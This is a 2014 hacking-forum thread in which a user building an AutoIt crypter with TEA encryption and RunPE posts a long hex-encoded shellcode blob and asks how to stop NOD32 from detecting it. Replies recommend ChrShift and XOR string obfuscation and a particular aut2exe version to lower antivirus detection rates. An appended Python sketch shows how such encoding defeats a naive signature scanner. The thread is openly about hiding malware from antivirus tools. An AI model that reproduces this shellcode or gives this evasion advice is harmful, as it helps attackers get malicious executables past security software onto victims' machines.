mark_deno Posted July 14, 2014 (edited)

I am currently working on an AutoIt crypter source (scantime), so I edited it with new encryption, TEA and RunPE (for runtime). The result is 5/60. NOD32 keeps catching this part of my RunPE shellcode:

$sShellCode = '0xB9B600305835353842454300383143343030464402460000353335363537003634384230353330290300384200784305143030' & _
    '03006C000C3430313838390034354643433634351045373437020E38353001020E393431333343305F0242009A014E0182002433031635C4303700' & _
    '3F353544004B000BD8433839000B042930002301170237006334453835463600373235433436333344443200453832300021440246009344414331' & _
    '45330030323033434238428037393043303337011900413146334135444500373735334238413528463033020F38000F3338004134463037334134' & _
    '40444539373532801C340838323487293033444229812836368075398002334368313033815F31802F815F30A04642374339803D31823D48313842' & _
    '809633378086380180284634454230343440323445373541828B424246838F43303635818F4388313734820332344482034833364682033436830B' & _
    '3592378313363682AF4337841B8838343882133936318203A8413645820342841B4384179244841745348313463082CBD44143834341840F41006E' & _
    'C10F244146C3214230C321423149C3134232C3214233C315424234C31542353436C10D42A8363639C20137C40738C407243934C2254241C3294242' & _
    '5236C2394243C40744C325421645C325004D41C111393837DDC24B394083C203C43739C40F001B11C233394437C23339453529C2213946C32141C4' & _
    '57413191C311413234C25541330052A1C0A941343533C1154180B929C2013636C30337C363413895C41139C34141C41F4142C329243838C31B3839' & _
    'C30938419C3732C111C09EC26D3843C34B243844C33D3845C345384649C33B3930C3033931C4013289C3193933C321393434C27D48393537C27939' & _
    '36C11D3863408341E74646354047400336774303C11E4003374303412440033877C406C023400339C4064015400341B74303C1E8400342A301A408' & _
    '43A30167E1116003A2814646A112A00145276403A308830146372227383025E4003123483832233C383339233E3834231CA00823253637C9224638' & _
    '37231B3634C309E1527D802B35A3016108A001E51C621936EDE41C35A301E41C36E0242005E41CFD631936E41CA408E41C21322005E51CFBA308E4' & _
    '1C3460196003E51C6046A001ED431146216CA01730C301E144A0016631A301230C37326403621137B633A401220C37E41BA31D356403B1A1503835' & _
    '356403A30835641F6D230C35641FA31D35653C220C35EF653C202AA0086A3C35651FE0646003DB651F621135641FA31D35653CA21D5E35651FE076' & _
    'E006431846631136FB641FE31436641F2154A024651F220CB636E41BA31D346518E214346518EDA248346518222F34E53763036518F16086383534' & _
    '651863036418E32276346518E222346418A340842B46DFA42B6518E322E537A216356418A116F360D9647E4542A11FE001007C617C544544637645' & _
    '647A4562AA38AC3533E41AA32A336A33336A33DA336A3333E41A632C33E41AA315B633E41A237533EA1A442C462375FE34E51AE328E51A63256533' & _
    '630304077FE175A02AC4237149D000B427731B3275740A34B06738F071C320F30632DB750A721432F517721432740A7403DB3424734933750AB220' & _
    '33740A931AF633740A133A33750A9302740A5143B7B016740A530B33F425308944700A6D540B35D18990783510073035342B3288320130128B45B2' & _
    '00453001707D313338344435410030463835453530311BF18E507E351202008038423581C00438443034303251041A445190355000700335303476' & _
    '35F291B00343808AB20350084444344652104242340494430036303431383030343042383346301F508236382044343542469F0A4333A991014143' & _
    '9F0143E00A30350A117006303346B2173530366241D09B464433F10E202A37F43835350834809B7509552A9F05F13107383531742BF001580CD305' & _
    'DB110630003474001207383F083008CBD10BB07C30710045411418600B99906B35469018B00642341114EF30A5409E901899074614045076321A06' & _
    '46701097033641343036F770146315711A44F118D005330DD3007F5F055305305BB423D302B905109D38DF110B210D7805001ED1003030AD5701BB' & _
    'FF05120A38130271A1806D3654AB3C4334E06F50AB11A656253035A646500C7219424490A545D0ABA03844313439700043F0ADBD38274430B1802D' & _
    '7028C02935B1019C303131B2C0B111033131320141F21435323334303020308E4331015B155030383433D1A848424243F0213038332A30B7A00A51' & _
    '2FB11C367436DF11433029FF21103303F101D0055440322791B1361D2531334451B23232D03638353E42B4063106D66FDF1D3F0635317B3B06C019' & _
    '34F564FF0330085D09351646403D90174540144332'

How do I get past this? Can I use M3's alternative to shellcode?
;=================================
; Author: M3
; Alternative Shell Execute for AutoIt
; Thanks to Black Zerox
; Usage: sShell(Path + exe)
;=================================
Func sShell($Path)
    ; Create the Windows Shell COM object and hand the path to ShellExecute
    Local $Shell = ObjCreate("shell.application")
    $Shell.ShellExecute($Path, "")
EndFunc

Edited July 14, 2014 by CrypterHacker
0b3y Posted July 15, 2014

Re: how to generate autoit shellcodes

Ask [hidden content], he knows a lot about AutoIt crypting :tongue:
chequinho Posted July 15, 2014

Re: how to generate autoit shellcodes

You're confusing shellcode with the ShellExecute function xD. The code by M3 simply runs a file.
DDoSer Posted July 15, 2014 (edited)

Re: how to generate autoit shellcodes

> I am currently working on an AutoIt crypter source (scantime), so I edited it with new encryption, TEA and RunPE (for runtime). The result is 5/60. NOD32 keeps catching this part of my RunPE shellcode. How do I get past this? Can I use M3's alternative to shellcode?
>
> ;=================================
> ; Author: M3
> ; Alternative Shell Execute for AutoIt
> ; Thanks to Black Zerox
> ; Usage: sShell(Path + exe)
> ;=================================
> Func sShell($Path)
>     Local $Shell = ObjCreate("shell.application")
>     $Shell.ShellExecute($Path, "")
> EndFunc

chequinho is right, the code by M3 simply runs a file.

To bypass memory operations in NOD32 you can simply use ChrShift or GetChr with simple math. Here is an example of GetChr with simple math (this method is used by RazorCrypt, but I changed it a bit):

[hidden content]

And a ChrShift example:

[hidden content]

My stub with encrypted RunPE DLL calls, using ChrShift and XOR encryption, gives this:

[spoiler=Result]
[hidden content]

Also, use the 3.3.8.1 version of aut2exe.

Edited July 15, 2014 by DDoSer
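As an added example, not code from DDoSer's post, from RazorCrypt, or from any of the hidden attachments: a small Python sketch of what a ChrShift-style character shift and a repeating-key XOR do to the literal strings a scantime signature matches on. The stub fragment, the shift value, the XOR key and the signature list are all constructed for the demo; the identifiers in the stub are the ones from M3's sShell snippet above, and the scanner is a deliberately naive substring matcher, not any real AV engine.

```python
# Added example (not from the thread): toy ChrShift / XOR string encoding
# beside a naive literal-substring scanner, to show why the encoded form no
# longer matches a scantime signature, and why the plaintext reappears once
# the stub decodes it. Every input below is constructed for the demo.

SHIFT = 7                  # assumed shift value; anything in 1..255 works
XOR_KEY = b"\x5a\x3c"      # assumed repeating XOR key, constructed

# Constructed stub fragment built from identifiers that appear in the thread.
SAMPLE_STUB = (
    'Local $Shell = ObjCreate("shell.application")\n'
    '$Shell.ShellExecute($Path, "")'
)

# Constructed "signatures": literal strings a scantime scanner might look for.
SIGNATURES = ["shell.application", "ShellExecute"]


def chr_shift_encode(text: str, shift: int = SHIFT) -> str:
    """ChrShift-style encoding: add a constant to every character code.
    Codes are kept in 0..255 so the result round-trips through latin-1."""
    return "".join(chr((ord(c) + shift) % 256) for c in text)


def chr_shift_decode(enc: str, shift: int = SHIFT) -> str:
    """Inverse of chr_shift_encode: subtract the same constant."""
    return "".join(chr((ord(c) - shift) % 256) for c in enc)


def xor_bytes(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR; the same call both encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def signature_hits(blob: bytes, sigs=SIGNATURES) -> list:
    """Naive scantime scanner: which literal signatures occur in blob."""
    return [s for s in sigs if s.encode("latin-1") in blob]


def scantime_vs_runtime(stub: str = SAMPLE_STUB) -> dict:
    """Report what the literal scanner sees at each stage of the stub's life:
    the plain source, the two encoded forms, and the decoded copy the stub
    must hold in memory right before it uses the strings."""
    plain = stub.encode("latin-1")
    shifted = chr_shift_encode(stub).encode("latin-1")
    xored = xor_bytes(plain)
    decoded = chr_shift_decode(shifted.decode("latin-1"))
    return {
        "plain": signature_hits(plain),
        "chr_shift": signature_hits(shifted),
        "xor": signature_hits(xored),
        "after_decode": signature_hits(decoded.encode("latin-1")),
        "roundtrip_ok": decoded == stub and xor_bytes(xored) == plain,
    }


if __name__ == "__main__":
    for stage, result in scantime_vs_runtime().items():
        print(f"{stage:>13}: {result}")
```

The after_decode stage is the caveat the thread circles around: whatever the stub decodes before use is back in memory as plaintext, so a scantime result like 5/60 says nothing about runtime (memory) detection, which is a separate problem.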
Fcuk Posted July 30, 2014

Re: how to generate autoit shellcodes

> Also, use the 3.3.8.1 version of aut2exe.

No, don't. Some AVs have false positives on runtime against 3.3.8.1.